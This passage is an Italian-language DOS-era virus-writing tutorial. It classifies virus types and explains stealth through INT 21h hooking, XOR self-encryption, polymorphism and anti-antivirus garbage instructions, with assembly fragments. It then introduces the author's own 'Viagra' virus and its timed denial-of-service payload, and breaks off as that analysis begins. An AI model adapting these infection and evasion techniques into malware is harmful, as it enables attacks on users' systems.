virus informatico. Tuttavia esiste una radicale differenza: il virus per
agire deve essere eseguito. Infatti un virus informatico e' del tutto
simile ad un normale programma che contiene normalissime istruzioni per
la macchina ! Proprio per questo motivo e' impossibile, per la CPU,
riconoscere il codice di un virus. Tuttavia ci sono dei "segni distintivi"
che possono aiutare a riconoscerlo ma ne parleremo piu' avanti. Al momento
basti sapere che un virus (da qui' in poi per "virus" intendo virus
informatico) e' un programma e deve essere eseguito (non sempre vero, ma
poi speghero' xche).

(2) Proprieta' comuni dei virus

Un virus per essere tale deve fondamentalmente essere in gradi di
replicare se stesso. All'atto pratico, nella maggioranza dei casi, cio'
non e' sufficente. Infatti esso deve, per quanto possibile, deve seguire
le seguenti regole:

1) Essere invisibile
2) Non provocare errori che possano insospettire l'ignaro utente
3) Non occupare troppo tempo macchina
4) Non essere troppo grande

La regola 1 e' propria dei virus STEALTH, che con opportune
techiche che vedremo, riescono a nascondersi all'utente.
Proprio per le regole 3 e 4 e' preferibile scrivere i virus in
Assembly, che permette una miglior ottimizzazione del codice.

(3) Classi dei Virus

Di tipi di virus (o classi) ce ne sono diverse. Non tutti i virus si
comportano allo stesso modo, hanno le stesse caratterisiche, gli stessi
metodi di infezione,etc.
Ecco quindi un breve "struttura gerarchica" di distinsione per i virus:

VIRUS +---- BINARI +--- COMPANION
| |
| +--- OVERWRITE
| |
| +--- FILLING
| |
| +--- APPEND
| |
| +--- BOOT
|
+---- NON BINARI +--- HOAX
|
+--- MACRO VIRUS
|
+--- "EXPLOIT" VIRUS

Avverto il lettore che alcune classi non hanno i nomi che ho indicato:
questo xche alcune classi NON hanno un nome specifico ;).

Partiamo ad analizzare l'albero dalla radice:

(3.1) VIRUS BINARI
Con la dicitura "Virus Binari" mi riferisco a tutti i virus scritti in un
linguaggio di programmazione (generalmente Assembly o anche C) e
compilati. I Virus Binari sono percui dei veri e propri programmi da
eseguire in linguaggio macchina.

(3.1.1) COMPANION
I virus Companion sono dei virus strani: essi si replicano senza
danneggiare alcun file ma utilizzano una tecnica propria del MS-DOS.
La priorita' di esecuzione dei file sotto MS-DOS e':
1) .BAT
2) .COM
3) .EXE
I virus Companion utilizzano prorpio questa caratteristica, ovvero se noi
abbiamo in una directory X un file chiamato X.EXE, il virus copia se
stesso in un file X.COM cosicche' se noi eseguiamo 'X' lanciamo il .COM
ovvero il virus ! Naturalmente all'interno del virus ci saranno delle
routine specifiche per eseguire anche X.EXE per evitare "sospetti". Ovvio
che il file X.COM e' spesso settato con l'attributi HIDDEN cosicche' con
un eventiale 'dir' non vediamo il nostro "amico" ;).

(3.1.2) OVERWRITE
Questa classe di virus e' la piu' criticata: in pratica il nostro virus
sovrascrive in maniera irreversibile il file originale, andando contro la
regola 2. In pratica se X.EXE prima dell'infezione e' un "editor" dopo
l'infezione esso sara' solo il virus. Percui se dovete scrivere una
lettera e lanciate X nessun editor vi apparira' ! La domanda che un utente
si pone a questo punto e': "Perche' ?" ed e' cio' che bisogna evitare in
un virus. Proprio per questo non e' affatto consigliabile scrivere virus
di tipo OVERWRITE.

Prima dell'infezione:
X.EXE -> [CODICE DEL FILE X.EXE]
Size: 10345 Byte

Dopo l'infezione:
X.EXE -> [CODICE DEL VIRUS][PARTE RESTANTE DI X.EXE]
Size: n Bytes Size: 10345-n Bytes

solo che la parte restante non viene mai eseguita. L'unico vantaggio di
questo tipo di virus e' che la dimenzioen del file rimane, spesso,
invariata.

(3.1.3) FILLING
Questa classe e' a mio avviso la piu' affascinate di tutte. Un virus di
tipo FILLING e' spesso, per ragioni di sicurezza, anche APPEND. Poi
vedremo xche.
Questo tipo di virus, solitamente di dimensioni molto piccole, cerca nel
file da "infettare" uno spazio vuoto in cui nascondersi. Spesso infatti
nei programmi ci sono degli spazi vuoti usati in fase di esecuzione come
stack e non contenenti alcun dato utile. Il virus ci si copia dentro senza
che nessuno noti nulla: anche la dimensione del file ospite rimane
invariata. In fase di esecuzione,poi, viene eseguito prima il virus e poi
il programma originale. Ecco un esempio in ASM:

[file TEST.COM non infetto]
start: JUMP main

stack DB 100 DUP(00h)

main: NOP
[codice del programma]

una volta compilato il codice binario sara' qualcosa tipo:

[0000] E9 00 10 [un ipotetico JUMP a main:]
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
...
00 00 00 00 00 00 00 00
[0100] 90 [Mnemonico del NOP, prima istruzione di main:]

il virus si annida nei 100 bytes a 00 (ammesso che il virus sia grande <=
100Bytes) e dopo l'infezione il file TEST.COM sara':

N.B. XX sta' per codice del virus.

[0000] E9 00 01 (Ora JMP salta al codice del virus, sara' poi compito del
virus stesso di eseguire il codice originale)
XX XX XX XX XX XX XX XX
...
XX XX XX XX XX XX XX XX
[0100] 90 [Mnemonico del NOP, prima istruzione di main:]

in fase di esecuzione:

[ESEGUI CODICE DEL VIRUS]->[ESEGUI CODICE ORIGINALE]

cosi' l'utente non si accorge di nulla in quanto il programma funziona
ancora perfettamente perche'il virus ha usato lo spazio per i DATI e non
per il CODICE.

Un ipotetico diagramma di flusso di un file FILLING sara':

(START) -> APRO FILE -> CERCO n BYTES a 00h (che non corrispondono ad
alcun mnemonico e che sono, proprio per questo motivo, dati) -> COPIATI
DENTRO ALLO SPAZIO -> PRELEVA PUNTO DI ESCUZIONE ORIGINALE -> SCRIVI IL
TUO PUNTO DI ESECUZIONE -> (FINE)

(3.1.4) APPEND (Non Overwriting Virus)
Eccoci alla classe di virus piu' diffusa, quella APPEND. Questo
particolare tipo di virus si attacca al programma originale conservandone
le proprieta'. Funziona analogamente al tipo FILLING solo che questo tipo
si copia esclusivamente alla fine del file.

Non infetto:
TEST.COM [DATI E CODICE DI TEST.COM]
Size: n Bytes

Dopo l'Infezione:
TEST.COM [DATI E CODICE DI TEST.COM][DATI E CODICE DEL VIRUS]
Size: n + v_size Bytes

Come avrete notato si ha un aumento in dimensioni del file contrastando la
regola 1. Infatti un utente con un semplice 'DIR' puo' notare che il file
e' cresciuto :) ed e' per questo che bisogna attenersi il piu' possibile
alla regola 4. C'e' anche una seconda soluzione: lo STEALTH di cui
parlero' piu' avanti.
Ecco un esempio di come funziona un virus APPEND (Non Overwriting Virus).


TEST.COM Originale Size: n Bytes

start: JUMP main
data DB 20 DUP(00)
main:
nop
nop
nop
int 20h [Fine del programma]


TEST.COM Infetto Size: n + virus_size Bytes

start: JUMP inizio_virus
data DB 20 DUP(00)
main:
nop
nop
nop
int 20h
inizio_virus:
[mi_faccio_i_cazzi_miei]
JUMP main

Come potete osservare per l'utente che esegueil programma infetto non
cambia assolutamente nulla: il codice del programma originale e' sempre
eseguito e siamo ok per la regola 2. :)

Un ipotetico diagramma di flusso potrebbe essere il seguente:
(START)->MI COPIO ALLA FINE DEL FILE OSPITE->GUARDO IL SUO PUNTO DI INIZIO
ESECUZIONE->ME LO ANNOTO->SCRIVO IL MIO PUNTO DI ESECUZIONE->(FINE)

In fase di esecuzione il virus, alla fine dei suoi lavori, fa' un JUMP al
programma originale et voila' ! Il gioco e' fatto ! ;)

(3.1.5) BOOT Virus
Adesso parlo, per correttezza, della calsse di virus che in passato ha
causato piu' danni. Adesso nessuno scrive piu' simili virus ma e' giusto
sapere che anche loro esistono. Famosissimo di questa classe e'il
Virus Michelangelo:

; Virus Name: Michelangelo
; V Status: Common
; Discovered: April, 1991
; Symptoms: Disk directory damage; hard disk format; decrease in total
; system and available memory
; Origin: Sweden or the Netherlands
; Eff Length: N/A
; Type Code: BRtX - Resident Floppy Boot Sector/Master Boot Sector Infector
; This is a disassembly of the much-hyped michelangelo virus.
; As you can see, it is a derivative of the Stoned virus. The
; junk bytes at the end of the file are probably throwbacks to
; the Stoned virus. In any case, it is yet another boot sector
; and partition table infector.

Il loro principio di funzionamento e' semplice: un tempo gli HD costavano
molto e i CD manco si conoscevano. I Floppy-disk erano molto comuni e si
usavano spesso come System Disk. All'avvio del computer (ancora oggi e'
cosi) il BIOS cerca se un dischetto nel floppy-drive e' presente. Se c'e'
esso carica ed esegue il primo settore che dovrebbe contenere il
Bootstrap Loader (ovvero lanciare il sistema, come nei dischi di ripistino
di Windoze). Il Bootstrap Loader e' un programma "particolare" che viene
eseguito come un qualsiasi altro programma.
Esempio tratto dal Terror2 Virus:

boot_start:
db 0E9h <<
db 9Dh << QUESTI 3 BYTES SONO IL JUMP A str_end:
db 00h <<
db "TERROR2" << ETICHETTA DEL DISCO
str_boot:
db " << The Terror II Virus >> ",13,10
db "PolyMorphic Stealth Boot Virus.",13,10
db " Created by Dark Monk.",13,10
db " '' Fuck MS-DOS ! ,, ",13,10
str_end:
db 29 DUP (90h) ; Scrivi 30 NOP
mov ax,0001h ; 320 * 200
int 10h ; Video
mov ah,0Fh
int 10h
...

Il settore di BOOT ha una specie di HEADER che serve al BIOS per capire
che dischetto e'. Al momento non ne ho le specifiche sotto mano ma
comunque in rete ci sono, cercate ! ;)
Allora cosa succede ?
Inserisci il dischetto nel drive, accendi il PC, il BIOS carica il codice
della traccia 0 e lo esegue....e se e' un virus ? Se e' un virus esso ha
il controllo della macchina. Certo, sono necessari accorgimenti
particolari: primo fra tutti e' che il settore e' 512 Bytes, di cui circa
400 utilizzabili percui un virus, prima di tutto, carichera' il suo corpo
principale in memoria e lo eseguira'. In pratica nel settore di BOOT non
c'e' il VIRUS ma il LOADER del VIRUS. Il VIRUS vero e proprio si occupera'
poi di ripistinare, in modo da seguire le regole 1 e 2, il vero boot
record e di eseguirlo. Ci sono varie tecniche che non ho voglia di
illustrarvi, semmai in un secondo momento.

(3.2) VIRUS NON BINARI

I Virus Non Binari (molti mi criticheranno ma non importa) sono quelle
cose che per replicarsi non devono essere, necessariamente, eseguite.
Una annotazione a parte per i virus "EXPLOIT": questo tipo di virus si
basa su errori di un particolare programma. Mi riferisco, in questo caso,
a Microsoft Outlook Express che i n una versione, in particolari
condizioni, eseguiva un file in ATTACH senza il permesso e/o la richiesta
dell'utente. Ovvio che un ipotetico file in ATTACH poteva infettare un
sistema semplicemente inviandolo tramite E-Mail. ;)
In generale i VIRUS NON BINARI sono quei virus non il linguaggio macchina.

(3.2.1) HOAX

Gli HOAX (Bufale) sono una nuova classe di virus apparsa su Internet e
diffusa grazie alla 'lameraggine' degli utenti. Ho gia detto che un virus,
per essere tale, deve replicare se stesso. Per questa proprieta'
fondamentale, un qualsiasi messaggio che riporti una dicitura del tipo:

SE INVII QUESTO MESSAGGIO AD ALTRE 5 PERSONE VINCERAI 1 MILIONE DI LIRE !

i piu' boccaloni invieranno subito, senz esitare, questo messaggio ad
altre 5 persone provocando una crescita del "virus" di ragione 5 ovvero:

START
|
+-----+-----+-----+-----+
| | | | |
+++++ +++++ +++++ +++++ +++++
||||| ||||| ||||| ||||| |||||

etc... quindi in 2 passaggi si hanno gia' 5*5 copie del messaggio creando
una vera e propria infezione ;). In 100 passaggi si hanno ben 5^100
messaggi causando uno SPAM di dimensioni enormi !

(3.2.2) MACRO VIRUS
I Macro Virus sono nati grazie ad una fatale caratteristica dei prodotti
Microsoft Office. Per velocizzare alcune operazioni frequenti e' possibile
creare delle Macro (chi programma sa' cosa sono) per velocizzare queste
operazioni. Nelle macro di MS Office e' possibile specificare di tutto:
apertura dei file, cancellazione, formattazione, etc..Una delle cose che
non permettono, per fortuna,e' la ripartizione del disco (ref. Melissa
Virus). Immaginatevi percui se invio ad un mio amico un documento .doc con
una macro (le macro sono dento i documenti !) con l'ordine di cancellare
tutto l'HD ! Fortunatamente i Macro Virus sono diffusi solo su sistemi
Microsoft, e piu' che virus sembrano vendette !!! ;)))

(3.2.3) EXPLOIT VIRUS
Come gia' accennato nell'introduzione, gli EXPLOIT virus sfruttano delle
particolari proprieta' dei Sistemi Operativi per diffondersi. Anche i
VERMI di Internet utilizzano questa caratteristica ma non sono virus
percui non ne parlo :). Il piu' famoso e' stato quello relativo ad Outlook
Express che, se inviavi un file infetto in ATTACH con un nuone piu' lungo
di 255 caratteri si provocava un Buffer Overflow con conseguente
esecuzione del codice del file in ATTACH.

[E-MAIL+ATTACH]->[OUTLOOK EXPRESS]->[BUFFER OVERFLOW & CRASH]->[ESEGUI
ATTACH]

Se ATTACH e' un virus appositamente progettato, ci ritroviamo con il
sistema infetto.

Non aggiungo altro all'argomento anche xche non sono molto ferrato sulla
questione.

(4) CARATTERISTICHE INTERESSANTI
In questo paragrafo parlero' di alcune caratteristiche interessanti dei
virus binari. Inaftti solo maneggiando il codice a livello macchina e'
possibile agire in modo cosi' profondo nel sistema.

(4.1) STEALTH
I virus stealth sono tra i piu' pericolosi. Analogamente all'F117
(Quell'aereo caccia-bombardiere stealth) i virus stealth sono "invisibili"
e cercano in ogni modo di coprirele proprie tracce. Per riuscirci
utilizzano delle caratteristiche base del sistema. Per esempio un virus
Dir Stealth (cheriesce a non far notare l'incremento di dimensione di un
file con il comando 'dir') si basa sul fatto che il COMMAND.COM,
all'arrivo di un 'dir' esegue un certo comnado sull'INT 21h (Interrupt 21h)
e ne visualizza la risposta. Il nostro virus, di conseguenza, cerchera' di
modificare la risposta. Ma come ?

Ecco uns asemplice rappresentazione dell atabella degli interrupt in un
sistema *sano*:

[DOS] -> [INT 01h] -> Routine Int 01h -> Ret
[INT 02h] -> Routine Int 02h -> Ret
[INT ...] -> Routine Int ... -> Ret
[INT 21h] -> Routine Int 21h -> Ret

N.B. 'Ret' significa "ritorno al chiamante, o al DOS".

ed adesso in un sistema inefftato da uno *pseudo* virus steath (e non
solo):

[DOS] -> [INT 01h] -> Routine Int 01h -> Ret
[INT 02h] -> Routine Int 02h -> Ret
[INT ...] -> Routine Int ... -> Ret
[INT 21h] -> Virus -> Routine Int 21h -> Virus -> Ret

Come vediamo il nostro virus *filtra* le chiamate in ingresso ed in
uscita. Se esso rileva una chiamata di 'dir' (poi entrero' nei
particolari) chiama l'INT 21h originale e ne attende la risposta, indi
modifica il risultato in modo che l'utente non noti nulla e ritorna al
chiamante. Il chiamante, ovviamente, non si accorge di nulla.
Per capire come funziona il modo di intercettazione delle chiamate di
Interrupt bisogna capire cosa sono gli Interrupt !
Ecco com'e' strutturata la tabella degli interrupt locata nella posizione
0000:0000 (Segmento 0 Offset 0) della memoria di sistema:

Offs | 4b | 4b |
-----+----+----+
0000 OffA SegA
0004 OffB SegB
0008 OffC SegC
...

In pratica chiamando l'INT 00 faccio una Call assoluta all'indirizzo
SegA:OffA. Con l'INT 01 a SegB:OffB e cosi' via. Per accedere ad un
elemento della tabella di interrupt basta scrivere queste righe:

xor ax,ax
mov es,ax ; ES = AX = 0
mov bx,word ptr es:[4*21h+0] ; OffSet
mov ax,word ptr es:[4*21h+2] ; Segmento
mov word ptr ds:[INT21h],bx ; Offset
mov word ptr ds:[INT21h[2]],ax ; Segmento
cli ; Disabilita INT

*** ADESSO METTO NEL VETTORE IL PUNTATORE ALLA NOSTRA ROUTINE:

mov word ptr es:[4*21h+0],offset newint21h ; OffSet della routine
mov word ptr es:[4*21h+2],ds ; Segmento della routine
sti ; Riabilita INT

Per semplicita' basta pensare che un Interrupt e' una Call ad una routine
particolare. Ecco una breve lista delle funzioni comuni dei primi
interrupt:

INT 00 - CPU-generated - DIVIDE ERROR
INT 01 - CPU-generated - SINGLE STEP; (80386+) - DEBUGGING EXCEPTIONS
INT 02 - external hardware - NON-MASKABLE INTERRUPT
INT 03 - CPU-generated - BREAKPOINT
INT 04 - CPU-generated - INTO DETECTED OVERFLOW
INT 05 - PRINT SCREEN; CPU-generated (80186+) - BOUND RANGE EXCEEDED
INT 06 - CPU-generated (80286+) - INVALID OPCODE
INT 07 - CPU-generated (80286+) - PROCESSOR EXTENSION NOT AVAILABLE
INT 08 - IRQ0 - SYSTEM TIMER; CPU-generated (80286+)
INT 09 - IRQ1 - KEYBOARD DATA READY; CPU-generated (80286,80386)
INT 0A - IRQ2 - LPT2/EGA,VGA/IRQ9; CPU-generated (80286+)
INT 0B - IRQ3 - SERIAL COMMUNICATIONS (COM2); CPU-generated (80286+)
INT 0C - IRQ4 - SERIAL COMMUNICATIONS (COM1); CPU-generated (80286+)
INT 0D - IRQ5 - FIXED DISK/LPT2/reserved; CPU-generated (80286+)
INT 0E - IRQ6 - DISKETTE CONTROLLER; CPU-generated (80386+)
INT 0F - IRQ7 - PARALLEL PRINTER
INT 10 - VIDEO; CPU-generated (80286+)
INT 11 - BIOS - GET EQUIPMENT LIST; CPU-generated (80486+)
INT 12 - BIOS - GET MEMORY SIZE
INT 13 - DISK
INT 14 - SERIAL
INT 15 - CASSETTE
INT 16 - KEYBOARD
INT 17 - PRINTER
INT 18 - DISKLESS BOOT HOOK (START CASSETTE BASIC)
INT 19 - SYSTEM - BOOTSTRAP LOADER
INT 1A - TIME
INT 1B - KEYBOARD - CONTROL-BREAK HANDLER
INT 1C - TIME - SYSTEM TIMER TICK
INT 1D - SYSTEM DATA - VIDEO PARAMETER TABLES
INT 1E - SYSTEM DATA - DISKETTE PARAMETERS
INT 1F - SYSTEM DATA - 8x8 GRAPHICS FONT
INT 20 - DOS 1+ - TERMINATE PROGRAM
INT 21 - DOS 1+ - Function Calls
INT 22 - DOS 1+ - PROGRAM TERMINATION ADDRESS
INT 23 - DOS 1+ - CONTROL-C/CONTROL-BREAK HANDLER
INT 24 - DOS 1+ - CRITICAL ERROR HANDLER
INT 25 - DOS 1+ - ABSOLUTE DISK READ
INT 26 - DOS 1+ - ABSOLUTE DISK WRITE
INT 27 - DOS 1+ - TERMINATE AND STAY RESIDENT
INT 28 - DOS 2+ - DOS IDLE INTERRUPT
INT 29 - DOS 2+ - FAST CONSOLE OUTPUT

Naturalmente 'newint21h' e' un puntatore alla nostra routine, alla routine
del virus:

INT21H dd ?

newint21h proc far
Assume CS:CODE_SEG, DS:Nothing
cmp ah,4Bh ; Load and Execute ?
je load_execute
cmp ah,11h ; Find First Matching File (Dir Stealth)
je dir_stealth
cmp ah,12h ; Find Next Matching File (Dir Stealth)
je dir_stealth
cmp ax,4300h ; Get File Attributes
je load_execute
cmp ax,4301h ; Set File Attributes
je load_execute
cmp ah,3Dh ; Open File
je load_execute
cmp ah,4Eh ; Find First Matching File (Dir Stealth)
je newdir_stealth
cmp ah,4Fh ; Find First Matching File (Dir Stealth)
je newdir_stealth
jmp do_int_now


Ecco, per capire questa parte di codice e' opportuno addentrarsi ancora di
piu' nelle chiamate di sistema:
L'interrupt 21h *contiene* tutte le chiamate importanti del nostro MS-DOS.
Consultando le RalphBrown Interrupt List si vede che l'INT2h e' quello che
conta piu' funzioni di tutti gli altri Int. Analizziamole qualcuna:

AH | AL | Altri Dati | Funzione
---+----+------------------+----------
00 CS = PSP Segment Termina un programma
01 Ret Ritorna un carattere letto da console
02 DL = Char Stampa il carattere in DL nella console
0F DS:DX -> FCB Apre un file usando FCB
10 DS:DX -> FCB Chiude un file aperto con FCB
11 DS:DX -> FCB Cerca primo file usando FCB
12 DS:DX -> FCB Trova prossimo file usando FCB
13 DS:DX -> FCB Cancella file usando FCB
14 DS:DX -> FCB Sequential read from FCB
1A DS:DX -> DTA Set Disk Area Transfer address
25 XX DS:DX -> New Int Setta il vettore dell'INT XX con New Int

comunque ce ne sono veramente tante. Vale la pena cercare su Internet le
Ralph Brown Interrupt list e dargli uno sguardo: sono affascinanti.
Non e' scopo di questo documento insegnarvi a scrivere virusma di imparare
a conoscerli percui non mi addentrero' nei possibili utilizzi delle
chiamate ne sui dettagli tecnici. Spero che abbiate compreso cosa sono gli
Interrupt, come si usano e a cosa servono.

Comunque di funzioni "stealthabili" ce ne sono molte, dipende solo da cosa
modifica il vostro virus ! :)
Per concludere questo affascinante argomento eccovi un breve diagramma di
flusso di una procedura DIR STEALTH:

(INIZIO) --> <FIND FIRST ?> -Yes->[Chiama INT21h originale]--+
| | |
+-No--> <FIND NEXT ?> -Yes-+ <File Infetto ?>
| | |
(FINE)<---------------No-+ |
^--[Modifica risultati]<--Yes-+

Il diagramma non e' realizzato nel migliore dei modi: comunque sia la
procedura si riassume nel controllare se un file "chiamato a rapporto" e'
infetto, se SI modificarlo e poi restituire i dati.

(4.2) ENCRIPTION

Questa curiosa ed interessante caratteristica ha fatto si' che gli Anti
Virus avessero un "problemuccio" in piu'. Infatti con questa
carateristica, spesso, i 'Pattern Matching AV' fallivano. Questa tecnica
consiste di rendere un virus invisibile crittandone i contenuti.
Ovviamente deve rimanere inalterata quella parte di codice che permette la
successiva decrittazione e proprio questo gli rende facilmente
intercettabili. Tuttavia vale la pena vedere come funziona. Le tecniche
per la codifica/decodifica sono infinite, anche se per semplicita' e
velocita' (ricordate regole 3 e 4 ?) sono preferite quelle simmetrice con
lo XOR. Guardiamoci la tabella della verita' di una funzione XOR:

A | B | O
---+---+--- ___
0 0 0 A -\ \
1 0 1 | >-- O
0 1 1 B -/___/
1 1 0

Immaginiamoci questo dato: 00010010 da codificare con XOR con questa
chiave: 01100110

00010010 XOR
01100110
-----------
01110100

adesso proviamo a "codificare" il isultato (01110100) con la stessa chiave
(01100110):

01110100 XOR
01100110
---------
00010010

Magia ! ;) Come vedete il risultato e' assolutamente il dato originale
(00010010) ed ecco xche la funzione XOR e' chiamata simmetrica: con due
codifiche successive si ottiene il risutato iniziale.
Ecco che allora la routine di codifica/decodifica e' la stessa.
Ma in dettaglio come funziona un virus crittato ?

[INIZIO VIRUS]
start_enc:
[ROTUINES_VARIE_DEL_VIRUS]
end_enc:
[CRIPT_DECRIPT_ROUTINE]

noi crittiamo solo il codice tra start_enc e end_enc in quanto un codice
macchina crittato non e' piu' esegubile ! Ecco che allora , al monento
dell'esecuzione, dobbiamo prima richiamare la funzione
CRIPT_DECRIPT_ROUTINE per rendere il virus esegubile. Il problema sta' nel
fatto che la CRIPT_DECRIPT_ROUTINE non e' codificabile e quindi rilevabile
dagli antivirus.
Ecco la procedura di codifica/decodifica:

; Enc-Decryption Routine
lea si,(Key + bp)
mov bx,ds:[si] ; BX = Key
lea si,(encrypt_start + bp) ; SI = Start of encrypted part
mov cx,((offset encrypt_end - offset encrypt_start)/2)+1 ; CX Size
dec_loop:
mov ax,word ptr ds:[si] ; 16-Bit simple XOR encryption
xor ah,bl
xor al,bh
mov word ptr ds:[si],ax
inc si
inc si
loop dec_loop

Avremo percui su DISCO il virus in questa forma:

[INIZIO]
[CODICE VIRUS CRITATTO]
[ROUTINE EN-DEC]

e in memoria (in esecuzione) questa:

[INIZIO]
[CODICE VIRUS IN CHIARO]
[ROUTINE EN_DEC]

Esiste anche una semplice tecnica,chaiamta Polymophic Encryption, che
permette di cambiare chiave ad ogni generazione del virus. La chiave,
ovviamente, dovra' essere memorizzata all'interno del suo corpo. Comunque
il principio di funzionamento e' lo stesso.

(4.3) POLIMORFICI

Questa categoria e' spesso insieme alla precedente. I virus puramente
Polimorfici sono rari e comunque il polimorfismo non e' alla portata di
tutti: costruire un motore polimorfico (cosi' si chiama quel pezzo di
codiche che "polimorfizza" il virus) e' molto difficile. Come funziona in
dettaglio un virus polimorfico ? Bene, prima di tutto pensiamo a quanti
metodi ci sono per fare una cosa.
Esempio: per mettere 0 in AX quanti modi ci sono ? Proviamo...

1) MOV AX,0
2) XOR AX,AX
3) SUB AX,AX
4) MOV BX,0 MOV AX,BX
...

diciamo pure *infiniti* :) Ed e' su questo che si basa un virus
polimorfico. In pratica se in un virus incontra l'istruzione MOV AX,0 esso
la sostituisce, a caso, con un suo simile. Cosi' un codice:

mov ax,0

puo' diventare:

xor ax,ax

oppure:

push bx
mov bx,0
mov ax,bx
pop bx

e in tutti questi casi il codice macchina corrispondente e' diverso cosa
x cui gli AntiVirus non ci capiscono piu' nulla ;).

Uno dei piu' famosi motori polimorfici e' l' Mta (Mutation Engine) scritto
da Dark Avenger, un mitico virus-writer bulgaro.

(4.4) ANTI A.V.

Questa categoria di trucchi e'molto divertente da applicare.Lo scopo
principale e' fare in modo che l'AntiVirus non riconosca che quel codice
e' un virus ;). I metodi per farlo sono molti e si basano essenzialmente
su alcune "pecche" degli AV. Sulla rivista specializzata VLAD ci sono
moltissime tecniche ben descrite.
Eccovi un esempio di come "tentare" utilizzando delle Garbage Instruction
(istruzioni spazzatura):

get_offs:
pop bp
inc ax ; << Garbage Instruction (confuse AV)
sub bp,offset get_offs ; In BP offset
; Check if encrypt
mov si,ds:[34h] ; << Garbage Instruction (confuse AV)
lea si,(encrypt_start + bp)
xchg di,si ; << Garbage Instruction (confuse AV)
xchg di,si ; << Garbage Instruction (confuse AV)
cmp byte ptr cs:[si],90h ; Encrypted ?
je encrypt_start ; Seems to be not :D
; Decryption Routine
lea si,(Key + bp)
add si,2 ; << Garbage Instruction (confuse AV)
xchg bx,si ; << Garbage Instruction (confuse AV)
dec bx ; << Garbage Instruction (confuse AV)
xchg bx,si ; <

  
0; Garbage Instruction (confuse AV)
mov bx,ds:[si] ; BX = Key
lea si,(encrypt_start + bp) ; SI = Start of encrypted part
mov cx,((offset encrypt_end - offset encrypt_start)/2)+1 ; CX Size
dec_loop:
mov ax,word ptr ds:[si] ; 16-Bit simple XOR encryption
int 03h ; << Garbage Instruction (confuse AV)
xor ah,bl
int 03h ; << Garbage Instruction (confuse AV)
xor al,bh
mov word ptr ds:[si],ax
inc si
int 03h ; << Garbage Instruction (confuse AV)
inc si
loop dec_loop

Le righe commentate con "Garbage Instruction..." si riferiscono ad
istruzioni *dummy* che rendono insensato (o,perlomeno, ci provano !) il
codice confondendo l'AntiVirus. Con questa metodologia si va' contro la
regola 4 ma bisogna cercare di trovare un buon compromesso tra difese e
offese.

(5) LEGISLAZIONE ITALIANA IN MATERIA DI VIRUS

(Grazie a Ferry Byte per le seguenti informazioni)

Carlo Sarzana di S. Ippolito, presidente aggiunto della sezione Gip del
Tribunale di Roma, nella sua relazione presentata al convegno sulla
criminalita' informatica tenutosi a Milano il 26 maggio 1994 rispetto alla
legge Conso (l. n. 547/93 pubblicata in Gazzetta Ufficiale n. 305
30.12.93) sui reati informatici osservava che:
1) con riguardo all'art. 615 ter., che punisce l'accesso abusivo a u
sistema informatico o telematico, la tutela e' limitata ai sistemi
informatici o telematici protetti da misure di sicurezza perche',
dovendosi tutelare il diritto di un soggetto specifico, e' necessario
che quest'ultimo abbia dimostrato, con la predisposizione di mezzi di
protezione sia logica che fisica, di voler espressamente riservare
l'accesso e la permanenza nel sistema alle sole persone da lui
autorizzate;
2) in riferimento all'art. 615 quater che punisce l'abusiva acquisizione e
diffusione di codici di accesso a sistemi informatici o telematici,
viene definito che, per la configurabilita' del delitto, e' richiesto il
dolo specifico, consistente nel fine di procurare un profitto a se' o ad
altri o di arrecare ad altri un danno;
3) a proposito dei virus (articolo 615-quinques) non commette reato colui
che per ragioni di studio o predisposizione di sistemi di prevenzione,
raccolga e/o custodisce programmi virus.

Art. 615-quinquies - (Diffusione di programmi diretti a danneggiare o
interrompere un sistema informatico). - Chiunque diffonde, comunica o
consegna un programma informatico da lui stesso o da altri redatto, avente
per scopo o per effetto il danneggiamento di un sistema informatico o
telematico, dei dati o dei programmi in esso contenuti o ad essi
pertinenti, ovvero l'interruzione, totale o parziale, o l'alterazione del
suo funzionamento, e' punito con la reclusione sino a due anni e con la
multa sino a lire venti milioni".

Come vedete la legislazione in materia e' piuttosto vaga ed imprecisa,
sarebbe punibile anche la Microsoft per il "DEL" e il "DELTREE" ;))
Del resto conviene non rischiare: la costituzione dice che la legge e'
uguale per tutti, ma e' proprio cosi' ?

BREVE INTERLUDIO

Adesso la parte "teorica" (se cosi' si puo' definire) e' finita. Segue
l'analisi di un vero virus informatico. Traetene spunto per verificare le
nozioni acquisite. Ricordate sempre: un vero virus-writer non compie mai
danni sul sistema altrui. Questo e' un invito esplicito a non scrivere
virus pericolosi o distruttivi. Coscenza vostra. :)

(6) DOPO LA TEORIA...LA PRATICA !

Ecco un esempio di virus. Si chiama VIAGRA ed e' la mia ultima creazione.
Si lo so' che e' vecchiotto ma e' da un bel po' che non scrivo virus per il
semplice motivo che non uso piu' l'MS-DOS ma solo Linux ;). W Linux !

ATTENZIONE !!! Questi sono solo pezzi del programma originale. Non possono
essere compilati e non sono,quindi, illegali. Essi non possono arrecare
alcun danno. Inoltre il sorgente contiene alcuni errori volutamente
aggiunti per evitare qualsiasi compilazione. Solamente una persona
esperta e motivata puo' essere in grado di assemblare un virus
funzionante.
Diffido chiunque dall'usare questo testo per scopi non educativi.
Nel caso in cui venga compilato ed eseguito non mi riterro' in alcun modo
responsabile per i danni che esso vi causera'. SOLO PER SCOPI DIDATTICI.

[ HEADER DEL VIRUS, INFORMAZIONI VARIE]
; Araknoid virus v0.1 (Viagra Virus)
;
; Written by D.N.A ! 15/12/1998
;
; * Virus Propriety
; þ Infect COM on:
; - Execute
; - Get Attributes
; - Set Attributes
; - Open
; þ Don't infect W*.COM (i.e. WIN.COM)
; þ Don't infect misnamed EXE (i.e. COMMAND.COM)
; þ Memory Invisible Resident
; þ Little Polimorphic Encryption
; þ Directory Stealth
; - Stealth using ah=11h/12h
; - Stealth using ah=4Eh/4Fh
; þ Garbage Instruction to confuse AV
;
; * Effect on Infected System
; þ When Infecting a file a 'V' flash on the top-right corner of screen
; þ RTM executables don't run (bug ?)
; þ On DoS a ball bounch over the screen and system is cut-of :)
;
; DoS
; Every Monday between 13:00 and 13:59 included, between October and December
; and a random number must be smaller than 3400h :)
; Keyboard disabled during operation.
; PC must be rebooted.
;
; * Defect
; þ Poor Anti-Debugging routines
; þ Simple and not-well optimized for "secure" reason
; þ Of course there is some bug ;)
;
; * Some Anti-Virus response
; þ F-Prot says that can be a variant of Int78 Virus
; þ NAV 5.0 recognize it as a New Virus
; þ TBAV can't recognize Viagra as a virus (Hehehe)
; þ SCAN from McAffee not mentioned ? Sorry...do u
; really think it's an AntiVirus ?

La prima cosa che devo fare e' conoscere la posizione del virus
